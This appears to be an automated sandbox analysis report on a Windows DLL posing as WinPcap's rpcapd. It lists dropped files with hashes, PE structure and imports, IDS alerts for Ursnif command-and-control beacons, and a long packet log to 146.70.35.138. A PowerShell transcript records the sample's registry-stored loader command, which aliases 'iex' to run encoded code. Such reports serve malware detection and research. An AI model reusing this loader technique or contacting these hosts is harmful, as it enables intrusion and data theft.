                                SHA-512:557EF63D5E3B0D3228229F28E76BADE02AC8844BAE6AA0D67C987A459C1D9B7430283C6AAFD98B56701993112344740A7BF128ECD2FD9E061A0C54C968650AA1
                                Malicious:false
                                 Preview:
                                 /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.0.cs"
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3584
                                Entropy (8bit):2.6392294884325143
                                Encrypted:false
                                SSDEEP:24:etGSc8+mUE7R853RY0kCG++4I4tkZfcuDZ0WI+ycuZhNwakScPNnq:6GXE7S50/JcYZX1ulwa3Mq
                                MD5:DF0CED5409923E601543A19300A5F2C0
                                SHA1:B5055B13C52F28A7AC23A4DC6F1BC7058B50EA16
                                SHA-256:95927D387C19566BAF533827449CDAF0EB132DF3DFF1F500ECCDDB1DAEC9313D
                                SHA-512:4F64BBE5A0E84FF07B70A07DCF97C58BC444B42800C4479E33F8424E6A8C3DA137AEA4E3F62D1991CD86B452840BEFDBC49013949082295D131875AEC65A0455
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):874
                                Entropy (8bit):5.318135012806756
                                Encrypted:false
                                SSDEEP:24:AId3ka6KgLpEvLwKaM5DqBVKVrdFAMBJTH:Akka67FEvEKxDcVKdBJj
                                MD5:1057CD175F0A0ED38ECEADB83BD825CC
                                SHA1:1510C0179E5FC3A55FB866668781A6CF04B43611
                                SHA-256:2CC8FD12A44EEFECF8ED908C4EE2C450036626C87C13A238A7F560E1891A528C
                                SHA-512:748F36E9A2484DC0413481447CB1325365F7DCE121E208AB2ED48ADF4282D18975FD66700E421AC6CEA98CD2A424AA71A3AADC956330DE4EC648356684B03435
                                Malicious:false
                                 Preview:
                                 C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.0.cs"

                                 Microsoft (R) Visual C# Compiler version 4.7.3056.0
                                 for C# 5
                                 Copyright (C) Microsoft Corporation. All rights reserved.

                                 This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1371
                                Entropy (8bit):5.404148001284477
                                Encrypted:false
                                SSDEEP:24:BxSAGdZOvBdaQx2DOXUWZJ/t+LCHt4qW4HjeTKKjX4CIym1ZJX0J/t+LCHt4gnxf:BZ9v6QoOFht4t4qDYB1Zaht4eZZcC
                                MD5:0B43799452C644E51F9DD4EF713574B6
                                SHA1:70329EFE7607D70C080CE16FE4CB78592B878CED
                                SHA-256:134FFA52B0570D604C1799C9CBB7AD9F2CD2B4154DD6166D79176D53A8C4BD58
                                SHA-512:1829C6541D3DAD2E8BF85716238A6B4251AAC6166E1FE122B0E43643FAF772B03DE20C3B244F50EA102E2CBBF4C67B004E82C4F0421705521A499885FCF18E5D
                                Malicious:false
                                 Preview:
                                 **********************
                                 Windows PowerShell transcript start
                                 Start time: 20220422152730
                                 Username: computer\user
                                 RunAs User: computer\user
                                 Configuration Name: 
                                 Machine: 910646 (Microsoft Windows NT 10.0.17134.0)
                                 Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))
                                 Process ID: 6932
                                 PSVersion: 5.1.17134.1
                                 PSEdition: Desktop
                                 PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                 BuildVersion: 10.0.17134.1
                                 CLRVersion: 4.0.30319.42000
                                 WSManStackVersion: 3.0
                                 PSRemotingProtocolVersion: 2.3
                                 SerializationVersion: 1.1.0.1
                                 **********************
                                 **********************
                                 Command start time: 20220422152730
                                 **********************
                                 PS>new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex;
                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.10709348833746
                                TrID:
                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                • Generic Win/DOS Executable (2004/3) 0.20%
                                • DOS Executable Generic (2002/1) 0.20%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:HxEWwh74qT.dll
                                File size:639303
                                MD5:5d2b5cbd8a574c9e35309e21ecf93a0e
                                SHA1:c15e583e28556f5d187197937b4d2a715ebf8ca7
                                SHA256:52d14c9cd56aa41ba98a24a4a3dc3674f7e281c3d79f6aca141382fb56585bcd
                                SHA512:e040b612277556aa5c4b669672f1ff4704bacab562a268c67bf80bdc4a861cdbc74f3a226b0a1d37f61db047228f8ee0b1acbe81accd19d38de28dbb0df94ddd
                                SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZR:+w1lEKOpuYxiwkkgjAN8ZR
                                TLSH:3DD4BD1A029B2102EBB6CE78A751636C54174CE09B01E2CFC9190DA395E35FBF4FA5ED
                                Icon Hash:74f0e4ecccdce0e4
                                Entrypoint:0x401023
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:fd1c62e6f93e304a27347077f6d2b44c
                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:
                                    Programming Language:
                                    • [ C ] VS2013 build 21005
                                    • [RES] VS2015 build 23026
                                    • [LNK] VS2013 UPD4 build 31101
                                    • [C++] VS2010 SP1 build 40219
                                    • [IMP] VS2012 UPD2 build 60315
                                    • [RES] VS2008 build 21022
                                    • [EXP] VS2015 UPD3.1 build 24215
                                    • [ C ] VS2012 UPD1 build 51106
                                    • [C++] VS2015 UPD3.1 build 24215
                                     Name                                  Virtual Address  Virtual Size  Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_IMPORT          0x97000          0xc8          .idata
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE        0x98000          0x703         .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_SECURITY        0x1000           0x1           .text
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC       0x99000          0x46b8        .reloc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG           0x41001          0x38          .rdata
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_IAT             0x9731c          0x254         .idata
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                     IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                     Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                     .text   0x1000           0x3f170       0x40000   False     0.371898651123   data       4.44682748237  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                     .rdata  0x41000          0x4001b       0x41000   False     0.805322265625   data       7.15716511851  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .data   0x82000          0x14957       0x12000   False     0.179578993056   data       5.40188601701  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                     .idata  0x97000          0xadd         0x1000    False     0.217041015625   data       2.64887682924  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                     .rsrc   0x98000          0x703         0x1000    False     0.1220703125     data       1.10395588442  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .reloc  0x99000          0x53a5        0x6000    False     0.152099609375   data       5.13419580461  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                     Name        RVA      Size   Type  Language  Country
                                     RT_VERSION  0x98170  0x3d0  data
                                     DLL           Import
                                     WINSPOOL.DRV  GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                                     msvcrt.dll    toupper
                                     USER32.dll    DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                                     OLEAUT32.dll  LHashValOfNameSysA
                                     SHELL32.dll   FindExecutableW
                                     KERNEL32.dll  lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                                     Secur32.dll   InitializeSecurityContextW
                                     ADVAPI32.dll  GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
                                     GDI32.dll     GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW
                                     Description        Data
                                     LegalCopyright     Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                                     InternalName       rpcapd
                                     FileVersion        4.0.0.1040
                                     CompanyName        CACE Technologies
                                     LegalTrademarks
                                     ProductName        WinPcap
                                     ProductVersion     4.0.0.1040
                                     FileDescription    Remote Packet Capture Daemon
                                     Build Description
                                     OriginalFilename   rpcapd.exe
                                     Translation        0x0000 0x04b0
                                     Timestamp                 Protocol  SID      Message                                                     Source Port  Dest Port  Source IP    Dest IP
                                     04/22/22-15:27:17.806871  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49775        80         192.168.2.7  146.70.35.138
                                     04/22/22-15:27:18.629540  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49775        80         192.168.2.7  146.70.35.138
                                     04/22/22-15:26:57.401743  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49771        80         192.168.2.7  13.107.43.16
                                     04/22/22-15:27:19.716505  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49775        80         192.168.2.7  146.70.35.138
                                     Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                    Apr 22, 2022 15:27:18.304615021 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304640055 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304661989 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.304675102 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.304692984 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.312458038 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.312640905 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344346046 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344400883 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344420910 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344455004 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344480038 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344496012 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344515085 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344521046 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344541073 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344547987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344564915 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344583035 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344603062 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344624996 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344654083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344680071 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344697952 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344702959 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344726086 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344772100 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344796896 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344813108 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344825029 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344841957 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.344964027 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.344990969 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345005989 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345015049 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345030069 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345031023 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345055103 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345069885 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345072031 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345097065 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.345097065 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.345141888 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.368489027 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.368733883 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384358883 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384401083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384418964 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384439945 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384465933 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384481907 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384506941 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384532928 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384546041 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384547949 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384586096 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384598017 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384623051 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384639025 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384675026 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384700060 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384773016 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384798050 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384813070 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384833097 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384838104 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384871960 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.384875059 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384891033 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.384916067 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.392765045 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.392951965 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425606012 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425728083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425769091 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425801992 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425831079 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425858021 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425875902 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425906897 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425906897 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.425950050 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.425966024 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426018000 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426044941 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426059008 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426069975 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426100969 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426114082 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426155090 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426155090 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426203012 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426248074 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426249981 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426295042 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426337004 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426361084 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426366091 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426412106 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426420927 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426465988 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426491976 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.426495075 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.426537037 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.450453997 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.450664043 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464291096 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464303017 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464329958 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464349031 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464365959 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464379072 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464396954 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464437962 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464452028 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464468002 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464494944 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464500904 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464515924 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464652061 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464725018 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464745045 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464802980 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464843035 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464871883 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464879036 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464895010 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464910984 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464946985 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.464965105 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.464976072 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465003967 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.465040922 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465080023 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465095997 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.465106964 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.465131998 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.474427938 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.474591970 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.503791094 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503837109 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503859043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503886938 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503930092 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503935099 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.503959894 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.503966093 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.503988981 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504003048 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504101038 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504237890 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504303932 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504386902 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504419088 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504448891 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504457951 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504477978 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.504482985 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.504534006 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505230904 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505280018 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505289078 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505307913 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505347013 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505371094 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505390882 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505412102 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505434036 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505455017 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505469084 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.505546093 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.505577087 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.527733088 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.527823925 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.544512987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544568062 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544596910 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544639111 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.544661999 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.544701099 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.544708967 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545233011 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545286894 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545330048 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545341969 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545378923 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545546055 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545604944 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545607090 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545617104 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545708895 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545715094 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545759916 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.545798063 CEST8049775146.70.35.138192.168.2.7
